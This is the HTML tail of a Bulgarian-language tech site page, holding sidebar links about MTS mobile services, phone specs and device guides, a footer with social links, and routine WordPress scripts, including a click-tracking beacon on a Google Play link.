href="https://shongames.ru/bg/android/kak-otklyuchit-uslugu-legkii-platezh-mts-sposoby-mts-legkii-platezh/">Измамници на MTS "Лесно плащане": кой го получи и какво да правя?</a></li> <li><a href="https://shongames.ru/bg/windows-10/promokody-na-skidku-mts-promokody-mts-promokod-mts-iyul/">Mts промо кодове Mts промо кодове юли</a></li> <li><a href="https://shongames.ru/bg/editors/kak-pozvonit-operatoru-mts-v-raznyh-sluchayah-vse-nomera-telefonov-svyaz-s/">Комуникация с "на живо" оператор MTS MTS оператор обратно повикване</a></li> <li><a href="https://shongames.ru/bg/iron/kak-podklyuchit-uslugu-mts-gde-moi-rebenok-mts-rebenok-pod-prismotrom-kak/">Mts дете под наблюдение</a></li> <li><a href="https://shongames.ru/bg/ios/mts-internet-tarify-sposoby-podklyucheniya-vygodnye-tarify-mts-mob-svyaz/">Изгодни тарифи mts Mob комуникация mts</a></li> <li><a href="https://shongames.ru/bg/antivirus/lichnyi-kabinet-mts-zaregistrirovatsya-po-nomeru-telefona-lichnyi/">Вход в личен акаунт на Mts, регистрация</a></li> <li><a href="https://shongames.ru/bg/smarttv/oltaim-internet-magazin-naruchnyh-chasov-i-aksessuarov/">Alltime промоционални кодове за отстъпка Какво се продава в "Oltime"</a></li> <li><a href="https://shongames.ru/bg/android/kak-zarabatyvat-na-yudu-kak-zarabatyvat-na-yudu-firma-yudu/">Как да печелите пари във фирмата Yuda Yudu</a></li> <li><a href="https://shongames.ru/bg/game/kak-zarabatyvat-na-yudu-kak-zarabatyvat-na-yudu-kak-zaregistrirovatsya-na-yudu-v-kachestve-mastera/">Как да спечелим пари на „Юда Как да се регистрирам на Юда като майстор</a></li> <li><a href="https://shongames.ru/bg/iron/dublikator-domofonnyh-klyuchei-ibutton-s-mozgami-iz-arduino-nano-sdelat-dublikat-klyucha/">Направете дублиран ключ от интеркома с помощта на копирна машина - прост и достъпен Дубликатор на домофонни rfid ключове на ръка</a></li> </ul> </li> <li id="recentcomments" class="widget widget_recentcomments"> <div class="widgettitle">Популярни материали</div> <ul> <li><a href="https://shongames.ru/bg/editors/kakoi-brend-televizorov-samyi-luchshii-luchshie-marki-televizorov-obzor-est-i/">Най-добрите марки телевизори: преглед</a></li> <li><a href="https://shongames.ru/bg/network/istochnik-bespereboinogo-pitaniya-ibp-pravila-utilizacii-starye/">Стари непрекъсваеми захранвания за компютъра</a></li> <li><a href="https://shongames.ru/bg/program/sozdanie-akkaunta-razrabotchika-v-google-play-instrukciya-o-tom-kak/">Инструкции как да регистрирате акаунт на разработчик и да добавите приложението си към Google Play Market</a></li> <li><a href="https://shongames.ru/bg/operating-systems/lg-e400-opisanie-mobilnyi-telefon-lg-e400-optimus-l3-black-wi-fi---eto/">Мобилен телефон LG E400 Optimus L3 (черен)</a></li> <li><a href="https://shongames.ru/bg/internet/kastomnye-proshivki-sony-xperia-z-ustanovka-kastomnoi-proshivki-rom-miui-v5-na-sony-xperia-z/">Инсталиране на персонализиран ROM MIUI v5 на Sony Xperia Z</a></li> <li><a href="https://shongames.ru/bg/smartphones/trafik-tele2-kak-proverit-komanda-kak-proverit-ostatok-trafika-na-tele2/">Как да проверите останалия трафик на тарифата на Tele2 „Моят онлайн“?</a></li> <li><a href="https://shongames.ru/bg/windows-10/sravnenie-samsung-s-7-i-aifon-6s/">Сравнение на Samsung 7 и iPhone 6s</a></li> <li><a href="https://shongames.ru/bg/internet/poluchenie-root-telefunken-tf-mid1007g-poluchenie-root-telefunken-tf-mid1007g-proshivka-dlya/">Получаване на Root Telefunken TF-MID1007G фърмуер за таблет telefunken</a></li> <li><a href="https://shongames.ru/bg/smarttv/blekberri-dtek-60-blackberry-dtek60---tehnicheskie-harakteristiki/">BlackBerry DTEK60 - Спецификации</a></li> <li><a href="https://shongames.ru/bg/windows-10/samsung-galaxy-grand-max---tehnicheskie-harakteristiki-samsung-galaxy-grand-max/">Samsung Galaxy Grand Max - Рецензии и подробни спецификации Операционната система е системният софтуер, който управлява и координира хардуерните компоненти в устройството.</a></li> </ul> </li> <li> </li> </ul> </aside> </div> </div> <footer class="main-footer"> <div class="wrap"> <ul class="widgets row cf"> <li class="widget col-4 widget_text" id="text-4"> <div class="textwidget"><img src="/logo.png" alt="" / loading=lazy loading=lazy></div> </li><li class="widget col-4 widget_text" id="text-5"> <div class="textwidget"> <div class="spmenu"> <a href="https://twitter.com/" title="Следвайте в Twitter" target="_blank"><span class="sprite_twitter"></span></a> <a href="https:/" title="Абонирайте се за G + емисия" target="_blank"><span class="sprite_gplus"></span></a> <a href="" title="Абонирайте се за Vkontakte" target="_blank"><span class="sprite_vk"></span></a> <a href="https://facebook.com/" title="Прочетете във Facebook" target="_blank"><span class="sprite_fbook" target="_blank"></span></a> </div> </div> </li> </ul> </div> <div class="lower-foot"> <div class="wrap"> <div class="widgets"> <div id="text-2"> <div class="textwidget"> <a href='https://play.google.com/store/apps/details?id=pdf.reader.converter.jpgtopdf.imagetopdf' target='_blank' onclick="navigator.sendBeacon('https://live.electrikhelp.com/iibim?q=gplay&sub1=shongames.ru&sub2=pdf.reader.converter.jpgtopdf.imagetopdf&u='+encodeURIComponent(window.location.href)+'&refjs='+encodeURIComponent(document.referrer)+'');"><img src='/googleplay.svg' style='opacity:0.4; height: 20px; margin:10px; '></a>Авторско право 2022. shongames.ru. Android. Операционна система. Мултимедия. Социални мрежи. Инструменти. Кодеци. графики. Всички права запазени.</div> </div><div id="nav_menu-2"><div class="menu-footer-container"><ul id="menu-footer" class="menu"> <li class="menu-item type-post_type object-page "><a href="">за проекта</a></li> <li class="menu-item type-post_type object-page "><a href="">Контакти</a></li> </ul></div></div> </div> </div> </div> </footer> </div> <script> /* <![CDATA[ */ var rcGlobal = { serverUrl :'https://shongames.ru', infoTemp :'%REVIEWER% - %POST%', loadingText :'Загрузка', noCommentsText :'No comments', newestText :'« К началу', newerText :'« В будущее', olderText :'В прошлое »', showContent :'', external :'', avatarSize :'32', avatarPosition :'left', anonymous :'Аноним' } ; /* ]]> */ </script> <div id="wpfront-scroll-top-container"><img src="https://shongames.ru/wp-content/plugins/wpfront-scroll-top/images/icons/1.png" alt="" / loading=lazy loading=lazy></div> <script type="text/javascript">function wpfront_scroll_top_init() { if(typeof wpfront_scroll_top == "function" && typeof jQuery !== "undefined") { wpfront_scroll_top({ "scroll_offset":100,"button_width":0,"button_height":0,"button_opacity":0.8,"button_fade_duration":200,"scroll_duration":400,"location":1,"marginX":20,"marginY":20,"hide_iframe":false,"auto_hide":false,"auto_hide_after":2} );} else { setTimeout(wpfront_scroll_top_init, 100);} }wpfront_scroll_top_init();</script> <script type='text/javascript'> var q2w3_sidebar_options = new Array(); q2w3_sidebar_options[0] = { "sidebar" : "primary-sidebar", "margin_top" : 50, "margin_bottom" : 2500, "stop_id" : "", "screen_max_width" : 799, "screen_max_height" : 0, "width_inherit" : false, "refresh_interval" : 1500, "window_load_hook" : false, "disable_mo_api" : false, "widgets" : ['execphp-3'] } ; </script> <script type="text/javascript" defer src="https://shongames.ru/wp-content/cache/autoptimize/js/autoptimize_5fdbf2a97d91b7569facf24e6a8fe54c.js"></script></body> </html>